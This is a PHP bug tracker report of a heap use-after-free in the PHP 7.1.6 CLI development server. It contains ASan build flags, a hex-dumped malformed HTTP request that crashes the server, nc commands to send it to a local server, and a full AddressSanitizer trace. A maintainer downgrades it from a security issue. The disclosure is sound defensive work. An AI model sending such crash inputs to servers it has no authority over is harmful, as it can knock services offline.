php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #74838 Use-after-free in php_cli_server_client_read_request()
Submitted: 2017-07-01 03:28 UTC Modified: 2017-07-02 01:53 UTC
Votes:1
Avg. Score:2.0 ± 0.0
Reproduced:0 of 1 (0.0%)
From: l dot wei at ntu dot edu dot sg Assigned:
Status: Open Package: CGI/CLI related
PHP Version: 7.1.6 OS: Ubuntu Linux x86
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2017-07-01 03:28 UTC] l dot wei at ntu dot edu dot sg
Description:
------------
A malformed HTTP packet is able to trigger a use-after-free in the CLI server shipped with PHP. Demonstrated on x86 Ubuntu with php-7.1.6 ASan build. 

Build options:
CC="`which gcc`" CFLAGS="-O0 -g -fsanitize=address" ./configure --prefix="`pwd`/../php7_x86/asan" --disable-shared --enable-mbstring --enable-wddx

Save the hex dump of min_repro.zip to min_repro.hex

$ xxd -r min_repro.hex > min_repro.zip
$ unzip min_repro.zip  // to min_repro
$ export USE_ZEND_OPTIONS=0
$ asan/bin/php -S 127.0.0.1:12345

In another terminal, do
$ cat min_repro | nc 127.0.0.1 12345

It may take a few tries to reproduce the issue.

Test script:
---------------
$ xxd -g 1 min_repro.zip 
0000000: 50 4b 03 04 14 00 02 00 08 00 4e 51 e1 4a 88 f3  PK........NQ.J..
0000010: 3e ba 38 00 00 00 ff 17 00 00 09 00 1c 00 6d 69  >.8...........mi
0000020: 6e 5f 72 65 70 72 6f 55 54 09 00 03 93 04 57 59  n_reproUT.....WY
0000030: b2 04 57 59 75 78 0b 00 01 04 e8 03 00 00 04 e8  ..WYux..........
0000040: 03 00 00 ed c8 a1 11 80 30 10 00 41 9f 2a be 02  ........0..A.*..
0000050: 78 2c 15 c4 c1 4c 42 ff ad 30 88 04 41 03 88 5d  x,...LB..0..A..]
0000060: 71 e2 ce a3 f5 58 73 88 fa 74 5b b2 5c f3 ed 91  q....Xs..t[.\...
0000070: af f2 39 00 00 00 00 00 c0 cf dc 50 4b 01 02 1e  ..9........PK...
0000080: 03 14 00 02 00 08 00 4e 51 e1 4a 88 f3 3e ba 38  .......NQ.J..>.8
0000090: 00 00 00 ff 17 00 00 09 00 18 00 00 00 00 00 01  ................
00000a0: 00 00 00 80 81 00 00 00 00 6d 69 6e 5f 72 65 70  .........min_rep
00000b0: 72 6f 55 54 05 00 03 93 04 57 59 75 78 0b 00 01  roUT.....WYux...
00000c0: 04 e8 03 00 00 04 e8 03 00 00 50 4b 05 06 00 00  ..........PK....
00000d0: 00 00 01 00 01 00 4f 00 00 00 7b 00 00 00 00 00  ......O...{.....

Expected result:
----------------
No Crash (Malformed HTTP request)

Actual result:
--------------
$ asan/bin/php -S 127.0.0.1:12345
PHP 7.1.6 Development Server started at Sat Jul  1 10:56:27 2017
Listening on http://127.0.0.1:12345
Document root is /home/weilei/php7_x86
Press Ctrl-C to quit.
=================================================================
==30329== ERROR: AddressSanitizer: heap-use-after-free on address 0xb57048b3 at pc 0x92208a9 bp 0xbfadcca8 sp 0xbfadcc9c
READ of size 1 at 0xb57048b3 thread T0
    #0 0x92208a8 in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1726
    #1 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329
    #2 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424
    #3 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841
    #4 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442
    #5 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452
    #6 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554
    #7 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384
    #8 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
    #9 0x80667d0 in _start (/home/weilei/php7_x86/asan/bin/php+0x80667d0)
0xb57048b3 is located 3 bytes inside of 5-byte region [0xb57048b0,0xb57048b5)
freed by thread T0 here:
    #0 0xb6167774 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16774)
    #1 0x921fa5e in php_cli_server_client_read_request_on_header_value /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1623
    #2 0x9211145 in php_http_parser_execute /home/weilei/php-7.1.6/sapi/cli/php_http_parser.c:1569
    #3 0x922060d in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1712
    #4 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329
    #5 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424
    #6 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841
    #7 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442
    #8 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452
    #9 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554
    #10 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384
    #11 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
previously allocated by thread T0 here:
    #0 0xb6167854 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16854)
    #1 0x8c86d58 in __zend_malloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2820
    #2 0x8c84c71 in _safe_malloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2477
    #3 0x92207a7 in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1722
    #4 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329
    #5 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424
    #6 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841
    #7 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442
    #8 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452
    #9 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554
    #10 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384
    #11 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
SUMMARY: AddressSanitizer: heap-use-after-free /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1726 php_cli_server_client_read_request
Shadow bytes around the buggy address:
  0x36ae08c0: fa fa fd fd fa fa 04 fa fa fa fd fd fa fa 00 00
  0x36ae08d0: fa fa 04 fa fa fa 00 00 fa fa 04 fa fa fa 00 00
  0x36ae08e0: fa fa 04 fa fa fa fd fd fa fa fd fd fa fa 04 fa
  0x36ae08f0: fa fa 00 fa fa fa fd fa fa fa fd fd fa fa 00 04
  0x36ae0900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 05 fa
=>0x36ae0910: fa fa fd fa fa fa[fd]fa fa fa fd fa fa fa fd fd
  0x36ae0920: fa fa 00 04 fa fa 00 03 fa fa 00 03 fa fa 00 00
  0x36ae0930: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fa
  0x36ae0940: fa fa 00 00 fa fa 04 fa fa fa fd fd fa fa 00 00
  0x36ae0950: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x36ae0960: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==30329== ABORTING
Aborted

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-07-01 06:47 UTC] l dot wei at ntu dot edu dot sg
Correction to the typo above in repro steps:

export USE_ZEND_ALLOC=0
 [2017-07-01 20:47 UTC] stas@php.net
-Type: Security +Type: Bug
 [2017-07-01 20:47 UTC] stas@php.net
Not a security issue - CLI server is not a production facility,
 [2017-07-02 01:53 UTC] l dot wei at ntu dot edu dot sg
Indeed, they affect some of the dev environments at most. Thanks for the quick response.
 
PHP Copyright © 2001-2020 The PHP Group
All rights reserved.
Last updated: Thu Dec 03 08:01:23 2020 UTC